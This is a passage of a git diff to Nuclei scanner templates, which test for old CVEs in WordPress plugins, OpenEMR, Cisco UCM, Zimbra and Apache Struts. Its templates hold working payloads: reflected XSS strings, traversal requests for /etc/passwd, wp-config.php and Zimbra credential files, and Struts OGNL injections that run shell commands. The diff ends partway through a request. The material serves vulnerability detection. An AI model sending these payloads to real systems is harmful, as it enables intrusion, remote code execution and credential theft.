words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2011/cve-2011-5181.yaml b/nuclei-templates/CVE-2011/cve-2011-5181.yaml new file mode 100644 index 0000000000..c7e74be15b --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-5181.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5181 + +info: + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2011/cve-2011-5265.yaml b/nuclei-templates/CVE-2011/cve-2011-5265.yaml new file mode 100644 index 0000000000..5412865a18 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-5265.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5265 + +info: + name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml new file mode 100644 index 0000000000..bda61c73ec --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-0896 + +info: + name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access + author: daffainfo + severity: high + description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + reference: + - https://packetstormsecurity.com/files/108631/ + - https://www.cvedetails.com/cve/CVE-2012-0896 + - http://secunia.com/advisories/47529 + - http://plugins.trac.wordpress.org/changeset/488883/count-per-day + classification: + cve-id: CVE-2012-0896 + tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0901.yaml b/nuclei-templates/CVE-2012/CVE-2012-0901.yaml new file mode 100644 index 0000000000..fd9c3dfd13 --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-0901.yaml @@ -0,0 +1,37 @@ +id: CVE-2012-0901 + +info: + name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 + classification: + cve-id: CVE-2012-0901 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml b/nuclei-templates/CVE-2012/CVE-2012-0991.yaml deleted file mode 100644 index 3a27e8c3a6..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2012-0991 - -info: - name: OpenEMR 4.1 - Local File Inclusion - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. - reference: - - https://www.exploit-db.com/exploits/36650 - - https://www.cvedetails.com/cve/CVE-2012-0991 - - http://osvdb.org/78729 - - http://www.securityfocus.com/bid/51788 - classification: - cve-id: CVE-2012-0991 - tags: cve,cve2012,lfi,openemr,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-3153.yaml b/nuclei-templates/CVE-2012/CVE-2012-3153.yaml index f130b705fd..d624c59d99 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-3153.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-3153.yaml @@ -5,16 +5,12 @@ info: author: Sid Ahmed MALAOUI @ Realistic Security severity: critical description: | - An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 - - https://www.oracle.com/security-alerts/cpuoct2012.html - - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html - classification: - cve-id: CVE-2012-3153 tags: cve,cve2012,oracle,rce requests: @@ -49,5 +45,3 @@ requests: name: linux_working_path regex: - "/.*/showenv" - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4273.yaml b/nuclei-templates/CVE-2012/CVE-2012-4273.yaml deleted file mode 100644 index be18341253..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4273.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2012-4273 - -info: - name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 - - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 - - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ - - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html - classification: - cve-id: CVE-2012-4273 - tags: cve,cve2012,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4768.yaml b/nuclei-templates/CVE-2012/CVE-2012-4768.yaml new file mode 100644 index 0000000000..d5f361f8f6 --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-4768.yaml @@ -0,0 +1,38 @@ +id: CVE-2012-4768 + +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt + - http://osvdb.org/85319 + - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + classification: + cve-id: CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-5913.yaml b/nuclei-templates/CVE-2012/CVE-2012-5913.yaml deleted file mode 100644 index 35eef6218f..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-5913.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2012-5913 - -info: - name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-5913 - - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ - - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html - - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt - classification: - cve-id: CVE-2012-5913 - tags: cve,cve2012,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/cve-2012-0896.yaml b/nuclei-templates/CVE-2012/cve-2012-0896.yaml deleted file mode 100644 index 5a0423bc41..0000000000 --- a/nuclei-templates/CVE-2012/cve-2012-0896.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2012-0896 - -info: - name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access - author: daffainfo - severity: high - description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. - reference: - - https://packetstormsecurity.com/files/108631/ - - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-0901.yaml b/nuclei-templates/CVE-2012/cve-2012-0901.yaml deleted file mode 100644 index 728c0ccd73..0000000000 --- a/nuclei-templates/CVE-2012/cve-2012-0901.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2012-0901 - -info: - name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 - tags: cve,cve2012,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-0991.yaml b/nuclei-templates/CVE-2012/cve-2012-0991.yaml new file mode 100644 index 0000000000..c9bbdc69ff --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-0991.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0991 + +info: + name: OpenEMR 4.1 - Local File Inclusion + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + reference: + - https://www.exploit-db.com/exploits/36650 + - https://www.cvedetails.com/cve/CVE-2012-0991 + tags: cve,cve2012,lfi,openemr,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-4273.yaml b/nuclei-templates/CVE-2012/cve-2012-4273.yaml new file mode 100644 index 0000000000..99a6f52d88 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4273.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-4768.yaml b/nuclei-templates/CVE-2012/cve-2012-4768.yaml deleted file mode 100644 index 5c198776f4..0000000000 --- a/nuclei-templates/CVE-2012/cve-2012-4768.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2012-4768 - -info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - tags: cve,cve2012,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-5913.yaml b/nuclei-templates/CVE-2012/cve-2012-5913.yaml new file mode 100644 index 0000000000..cdbbce256d --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-5913.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-5913 + +info: + name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2013/CVE-2013-2251.yaml b/nuclei-templates/CVE-2013/CVE-2013-2251.yaml deleted file mode 100644 index a9c45c26ce..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-2251.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2013-2251 - -info: - name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution - author: exploitation,dwisiswant0,alex - severity: critical - description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. - reference: - - http://struts.apache.org/release/2.3.x/docs/s2-016.html - - https://cwiki.apache.org/confluence/display/WW/S2-016 - - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 - remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. - classification: - cve-id: CVE-2013-2251 - tags: cve,cve2013,rce,struts,apache,ognl - -requests: - - raw: - - | - GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - payloads: - params: - - "redirect" - - "action" - - "redirectAction" - - matchers-condition: and - matchers: - - type: status - condition: or - status: - - 200 - - 400 - - - type: regex - part: body - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/cve-2013-2287.yaml b/nuclei-templates/CVE-2013/CVE-2013-2287.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-2287.yaml rename to nuclei-templates/CVE-2013/CVE-2013-2287.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml b/nuclei-templates/CVE-2013/CVE-2013-3526.yaml deleted file mode 100644 index 2f271d0f3b..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-3526.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2013-3526 - -info: - name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - - http://osvdb.org/92197 - - http://www.securityfocus.com/bid/58948 - classification: - cve-id: CVE-2013-3526 - tags: cve,cve2013,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2013/cve-2013-4117.yaml b/nuclei-templates/CVE-2013/CVE-2013-4117.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-4117.yaml rename to nuclei-templates/CVE-2013/CVE-2013-4117.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-4625.yaml b/nuclei-templates/CVE-2013/CVE-2013-4625.yaml index 81f60cc764..e2184bc7a0 100644 --- a/nuclei-templates/CVE-2013/CVE-2013-4625.yaml +++ b/nuclei-templates/CVE-2013/CVE-2013-4625.yaml @@ -1,18 +1,11 @@ id: CVE-2013-4625 info: - name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 - - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - - http://osvdb.org/95627 - - http://archives.neohapsis.com/archives/bugtraq/2013-07/0161.html - remediation: Upgrade to Duplicator 0.4.5 or later. - classification: - cve-id: CVE-2013-4625 + description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 tags: cve,cve2013,wordpress,xss,wp-plugin requests: @@ -35,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2013/CVE-2013-5528.yaml b/nuclei-templates/CVE-2013/CVE-2013-5528.yaml index c6a9f04a15..aae2a740e1 100644 --- a/nuclei-templates/CVE-2013/CVE-2013-5528.yaml +++ b/nuclei-templates/CVE-2013/CVE-2013-5528.yaml @@ -4,14 +4,8 @@ info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - reference: - - https://www.exploit-db.com/exploits/40887 - - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - - http://www.securityfocus.com/bid/62960 - classification: - cve-id: CVE-2013-5528 + description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + reference: https://www.exploit-db.com/exploits/40887 tags: cve,cve2013,lfi,cisco requests: @@ -24,10 +18,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2013/CVE-2013-7091.yaml b/nuclei-templates/CVE-2013/CVE-2013-7091.yaml new file mode 100644 index 0000000000..ae2e8ddeea --- /dev/null +++ b/nuclei-templates/CVE-2013/CVE-2013-7091.yaml @@ -0,0 +1,41 @@ +id: CVE-2013-7091 + +info: + name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion + author: rubina119 + severity: critical + description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 + - https://www.exploit-db.com/exploits/30085 + - https://www.exploit-db.com/exploits/30472 + - http://osvdb.org/100747 + classification: + cve-id: CVE-2013-7091 + tags: cve,cve2013,zimbra,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + words: + - "zimbra_server_hostname" + - "zimbra_ldap_userdn" + - "zimbra_ldap_password" + - "ldap_postfix_password" + - "ldap_amavis_password" + - "ldap_nginx_password" + - "mysql_root_password" + condition: or + + - type: regex + regex: + - "root=.*:0:0" + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2013/CVE-2013-7240.yaml b/nuclei-templates/CVE-2013/CVE-2013-7240.yaml deleted file mode 100644 index 6ad0335e9a..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-7240.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2013-7240 - -info: - name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. - reference: - - https://www.exploit-db.com/exploits/38936 - - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ - - http://seclists.org/oss-sec/2013/q4/570 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2013-7240 - cwe-id: CWE-22 - tags: cve,cve2013,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_HOST" - - "The base configurations of the WordPress" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2013/cve-2013-2251.yaml b/nuclei-templates/CVE-2013/cve-2013-2251.yaml new file mode 100644 index 0000000000..261a2f0b68 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-2251.yaml @@ -0,0 +1,45 @@ +id: CVE-2013-2251 + +info: + name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution + author: exploitation,dwisiswant0,alex + severity: critical + description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code. + reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html + tags: cve,cve2013,rce,struts,apache,ognl + +requests: + - raw: + - | + GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET 